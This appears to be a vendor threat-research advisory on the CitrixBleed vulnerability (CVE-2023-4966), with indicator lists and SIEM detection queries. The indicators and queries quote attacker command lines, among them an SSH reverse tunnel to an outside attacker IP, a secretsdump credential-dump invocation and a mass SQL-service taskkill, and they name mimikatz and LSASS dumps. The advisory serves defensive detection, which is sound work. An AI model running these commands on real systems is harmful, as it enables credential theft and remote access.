CitrixBleed (CVE-2023-4966) - Detections

    Tuesday, September 17, 2024 In: Threat Research Print

    Date: 09/17/2024

    Severity: High

    Summary

    Citrix Bleed (CVE-2023-4966) is a critical information disclosure vulnerability impacting Citrix Netscaler Gateway and Netscaler ADC products, with a CVSS score of 9.4. Citrix addressed this issue with a patch released on October 10, 2023.This vulnerability enables unauthenticated attackers to extract session tokens through a specially crafted request, potentially gaining unauthorized access to affected systems. Additionally, security firm Assetnote has published detailed information and proof of concept (PoC) code for exploiting this vulnerability.

    Indicators of Compromise (IOC) List

    URL/Domain

    http://81.19.135.219/f8ptz87fe8djwqe.hta

    https://adobe-us-updatefiles.digital/index.php

    adobe-us-updatefiles.digital

    IP Address

    192.229.221.95

    193.201.9.224

    62.233.50.25

    51.91.79.17

    70.37.82.20

    185.17.40.178

    185.229.191.41

    81.19.135.219

    45.129.137.233

    185.229.191.41

    172.67.129.176

    104.21.1.180

    81.19.135.219

    81.19.135.220

    81.19.135.226

    101.97.36.61

    168.100.9.137

    185.20.209.127

    185.230.212.83

    206.188.197.22

    54.84.248.205

    141.98.9.137

    127.0.0.1

    Hash

    9b6b722ba4a691a2fe21747cd5b8a2d18811a173413d4934949047e04e40b30a

4c1346eab3fb23ca0613d73bbd2dd87fedb6ca8b1ba7bf48d69a57868d05854d

e557e1440e394537cca71ed3d61372106c3c70eb6ef9f07521768f23a0974068

13d525588d2f6babe0b6de7d1456a6f3f39a0947128280a94b6f676dd5684201

09f7622eb9ed3bbd375575c8a190ff152ef3572a717a20c1b2dd5556b8cc9eba

906602ea3c887af67bcb4531bbbb459d7c24a2efcb866bcb1e3b028a51f12ae6

17a27b1759f10d1f6f1f51a11c0efea550e2075c2c394259af4d3f855bbcc994

005cfd8a4dd101c127bcb0f94f1fa143b24d91442ee9e1525b4c540c9fe88c63

cc21c77e1ee7e916c9c48194fad083b2d4b2023df703e544ffb2d6a0bfc90a63

ed5d694d561c97b4d70efe934936286fe562addf7d6836f795b336d9791a5c44

498ba0afa5d3b390f852af66bd6e763945bf9b6bff2087015ed8612a18372155

c06e320ad2568e15baae155346c6fb92e18fc038e7465adfb5fc2a3f8af9caa5

    Process creations

    C:\Users\Public\Documents\s.exe

    C:\Users\Public\Documents\dsquery.exe

    C:\Users\Public\Documents\dsget.exe

    C:\Users\Public\Libraries\7z2301-x64.exe

    C:\Users\Public\Libraries\mRemoteNG-Installer-1.76.20.24615.msi

    C:\Users\Public\Libraries\python-3.12.0-amd64.exe

    Commandline

    123.ps1, 

    Plink.exe, 

    AnyDeskMSI.exe,

    SRUtility.exe,netscan.exe, 

    cmd.exe /q /c cd 1> \\127.0.0.1\admin$\__1698617793[.]44 2>&1,

    cmd.exe /q /c cd \ 1> \\127.0.0.1\admin$\__1698617793[.]44 2>&1,

    cmd.exe /q /c query user 1> \\127.0.0.1\admin$\__1698617793[.]44 2>&1,

    cmd.exe /q /c taskkill /f /im sqlwriter.exe /im winmysqladmin.exe /im w3sqlmgr.exe /im sqlwb.exe /im sqltob.exe /im sqlservr.exe /im sqlserver.exe /im sqlscan.exe /im sqlbrowser.exe /im sqlrep.exe /im sqlmangr.exe /im sqlexp3.exe /im sqlexp2.exe /im sqlex, 

    cmd.exe /q /c cd \ 1> \\127.0.0.1\admin$\__1698618133[.]54 2>&1,

    secretsdump.py <domain>/<username>@<ip> -outputfile 1, 

    echo enter | c:\windows\servicehost.exe -ssh -r 8085:127.0.0.1:8085 <username>@168.100.9[.]137 -pw <password>

    Filename

    		 

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    URL/Domain

    userdomainname like "http://81.19.135.219/f8ptz87fe8djwqe.hta" or url like "http://81.19.135.219/f8ptz87fe8djwqe.hta" or userdomainname like "https://adobe-us-updatefiles.digital/index.php" or url "https://adobe-us-updatefiles.digital/index.php" or userdomainname like "adobe-us-updatefiles.digital" or url like "adobe-us-updatefiles.digital"

    IP Address

    dstipaddress IN ("192.229.221.95","193.201.9.224","62.233.50.25","51.91.79.17","70.37.82.20","185.17.40.178","185.229.191.41","81.19.135.219","45.129.137.233","185.229.191.41","172.67.129.176","104.21.1.180","81.19.135.219","81.19.135.220","81.19.135.226","101.97.36.61","168.100.9.137","185.20.209.127","185.230.212.83","206.188.197.22","54.84.248.205","141.98.9.137","127.0.0.1") or ipaddress IN ("192.229.221.95","193.201.9.224","62.233.50.25","51.91.79.17","70.37.82.20","185.17.40.178","185.229.191.41","81.19.135.219","45.129.137.233","185.229.191.41","172.67.129.176","104.21.1.180","81.19.135.219","81.19.135.220","81.19.135.226","101.97.36.61","168.100.9.137","185.20.209.127","185.230.212.83","206.188.197.22","54.84.248.205","141.98.9.137","127.0.0.1") or publicipaddress IN ("192.229.221.95","193.201.9.224","62.233.50.25","51.91.79.17","70.37.82.20","185.17.40.178","185.229.191.41","81.19.135.219","45.129.137.233","185.229.191.41","172.67.129.176","104.21.1.180","81.19.135.219","81.19.135.220","81.19.135.226","101.97.36.61","168.100.9.137","185.20.209.127","185.230.212.83","206.188.197.22","54.84.248.205","141.98.9.137","127.0.0.1") or srcipaddress IN ("192.229.221.95","193.201.9.224","62.233.50.25","51.91.79.17","70.37.82.20","185.17.40.178","185.229.191.41","81.19.135.219","45.129.137.233","185.229.191.41","172.67.129.176","104.21.1.180","81.19.135.219","81.19.135.220","81.19.135.226","101.97.36.61","168.100.9.137","185.20.209.127","185.230.212.83","206.188.197.22","54.84.248.205","141.98.9.137","127.0.0.1")

    Hash

    sha256hash IN (“9b6b722ba4a691a2fe21747cd5b8a2d18811a173413d4934949047e04e40b30a”,"4c1346eab3fb23ca0613d73bbd2dd87fedb6ca8b1ba7bf48d69a57868d05854d","e557e1440e394537cca71ed3d61372106c3c70eb6ef9f07521768f23a0974068","13d525588d2f6babe0b6de7d1456a6f3f39a0947128280a94b6f676dd5684201","09f7622eb9ed3bbd375575c8a190ff152ef3572a717a20c1b2dd5556b8cc9eba","906602ea3c887af67bcb4531bbbb459d7c24a2efcb866bcb1e3b028a51f12ae6","17a27b1759f10d1f6f1f51a11c0efea550e2075c2c394259af4d3f855bbcc994","005cfd8a4dd101c127bcb0f94f1fa143b24d91442ee9e1525b4c540c9fe88c63","cc21c77e1ee7e916c9c48194fad083b2d4b2023df703e544ffb2d6a0bfc90a63","ed5d694d561c97b4d70efe934936286fe562addf7d6836f795b336d9791a5c44","498ba0afa5d3b390f852af66bd6e763945bf9b6bff2087015ed8612a18372155","c06e320ad2568e15baae155346c6fb92e18fc038e7465adfb5fc2a3f8af9caa5")

    Detection Query 1

    (resourcename = "Windows Security"  AND eventtype = "4688"  ) AND newprocessname In ("C:\Users\Public\Documents\s.exe","C:\Users\Public\Documents\dsquery.exe","C:\Users\Public\Documents\dsget.exe","C:\Users\Public\Libraries\7z2301-x64.exe","C:\Users\Public\Libraries\mRemoteNG-Installer-1.76.20.24615.msi","C:\Users\Public\Libraries\python-3.12.0-amd64.exe")

    Detection Query 2

    technologygroup = "EDR" AND newprocessname In ("C:\Users\Public\Documents\s.exe","C:\Users\Public\Documents\dsquery.exe","C:\Users\Public\Documents\dsget.exe","C:\Users\Public\Libraries\7z2301-x64.exe","C:\Users\Public\Libraries\mRemoteNG-Installer-1.76.20.24615.msi","C:\Users\Public\Libraries\python-3.12.0-amd64.exe")

    Detection Query 3

    (resourcename = "Windows Security"  AND eventtype = "4688"  ) AND newprocessname In ("Teamviewer","123.ps1"," Plink.exe"," AnyDeskMSI.exe","SRUtility.exe","netscan.exe"," cmd.exe /q /c cd 1> \\127.0.0.1\admin$\__1698617793[.]44 2>&1","cmd.exe /q /c cd \ 1> \\127.0.0.1\admin$\__1698617793[.]44 2>&1","cmd.exe /q /c query user 1> \\127.0.0.1\admin$\__1698617793[.]44 2>&1"," cmd.exe /q /c taskkill /f /im sqlwriter.exe /im winmysqladmin.exe /im w3sqlmgr.exe /im sqlwb.exe /im sqltob.exe /im sqlservr.exe /im sqlserver.exe /im sqlscan.exe /im sqlbrowser.exe /im sqlrep.exe /im sqlmangr.exe /im sqlexp3.exe /im sqlexp2.exe /im sqlex"," cmd.exe /q /c cd \ 1> \\127.0.0.1\admin$\__1698618133[.]54 2>&1","secretsdump.py <domain>/<username>@<ip> -outputfile 1"," echo enter | c:\windows\servicehost.exe -ssh -r 8085:127.0.0.1:8085 <username>@168.100.9[.]137 -pw <password>")

    Detection Query 4

    technologygroup = "EDR" AND newprocessname In ("Teamviewer","123.ps1"," Plink.exe"," AnyDeskMSI.exe","SRUtility.exe","netscan.exe"," cmd.exe /q /c cd 1> \\127.0.0.1\admin$\__1698617793[.]44 2>&1","cmd.exe /q /c cd \ 1> \\127.0.0.1\admin$\__1698617793[.]44 2>&1","cmd.exe /q /c query user 1> \\127.0.0.1\admin$\__1698617793[.]44 2>&1"," cmd.exe /q /c taskkill /f /im sqlwriter.exe /im winmysqladmin.exe /im w3sqlmgr.exe /im sqlwb.exe /im sqltob.exe /im sqlservr.exe /im sqlserver.exe /im sqlscan.exe /im sqlbrowser.exe /im sqlrep.exe /im sqlmangr.exe /im sqlexp3.exe /im sqlexp2.exe /im sqlex"," cmd.exe /q /c cd \ 1> \\127.0.0.1\admin$\__1698618133[.]54 2>&1","secretsdump.py <domain>/<username>@<ip> -outputfile 1"," echo enter | c:\windows\servicehost.exe -ssh -r 8085:127.0.0.1:8085 <username>@168.100.9[.]137 -pw <password>")

    Detection Query 5

    (resourcename in ("Windows Security" ) AND eventtype = "4663"  ) AND winmessage In ("Mag.dll","Adobelib.dll","c:\\users\\<username>\\downloads\\process hacker 2\\peview.exe","c:\\users\\<username>\\music\\process hacker 2\\processhacker.exe","psexesvc.exe","c:\\perflogs\\processhacker.exe","c:\\windows\\temp\\screenconnect\\23.8.5.8707\\files\\processhacker.exe","c:\\perflogs\\lsass.dmp","c:\\users\\<username>\\downloads\\mimikatz.exe","c:\\users\\<username>\\desktop\\proc64\\proc.exe","c:\\users\\<username>\\documents\\veeam-get-creds.ps1","secretsdump.py","ad.ps1","c:\\perflogs\\64-bit\\netscan.exe","tniwinagent.exe","psexec.exe","7z.exe","c:\\perflogs\\1.exe","c:\\perflogs\\run.exe","c:\\perflogs\\64-bit\\m.exe","c:\\perflogs\\64-bit\\m0.exe","c:\\perflogs\\za_access_my_department.exe","c:\\users\\<username>\\music\\za_access_my_department.exe","c:\\windows\\servicehost.exe","c:\\windows\\sysconf.bat","c:\\windows\\temp\\screenconnect\\23.8.5.8707\\files\\azure.msi")

    Detection Query 6

    technologygroup = "EDR" AND winmessage In ("Mag.dll","Adobelib.dll","c:\\users\\<username>\\downloads\\process hacker 2\\peview.exe","c:\\users\\<username>\\music\\process hacker 2\\processhacker.exe","psexesvc.exe","c:\\perflogs\\processhacker.exe","c:\\windows\\temp\\screenconnect\\23.8.5.8707\\files\\processhacker.exe","c:\\perflogs\\lsass.dmp","c:\\users\\<username>\\downloads\\mimikatz.exe","c:\\users\\<username>\\desktop\\proc64\\proc.exe","c:\\users\\<username>\\documents\\veeam-get-creds.ps1","secretsdump.py","ad.ps1","c:\\perflogs\\64-bit\\netscan.exe","tniwinagent.exe","psexec.exe","7z.exe","c:\\perflogs\\1.exe","c:\\perflogs\\run.exe","c:\\perflogs\\64-bit\\m.exe","c:\\perflogs\\64-bit\\m0.exe","c:\\perflogs\\za_access_my_department.exe","c:\\users\\<username>\\music\\za_access_my_department.exe","c:\\windows\\servicehost.exe","c:\\windows\\sysconf.bat","c:\\windows\\temp\\screenconnect\\23.8.5.8707\\files\\azure.msi")

    Reference: 

    https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a

    https://symantec-enterprise-blogs.security.com/threat-intelligence/ransomware-attacks-exploits

    https://unit42.paloaltonetworks.com/threat-brief-cve-2023-4966-netscaler-citrix-bleed

    https://www.tenable.com/cve/CVE-2023-4966 


    Tags

    CISARansomwareCVE-2023Exploit

    « Previous ArticleNext Article »

    Comments

    No records to display

    Looking for Something?
    Threat Research Categories:
    Tags

    Privacy & Security StatementTerms & Conditions
    Copyright © 2024 by Gurucul - All rights reserved.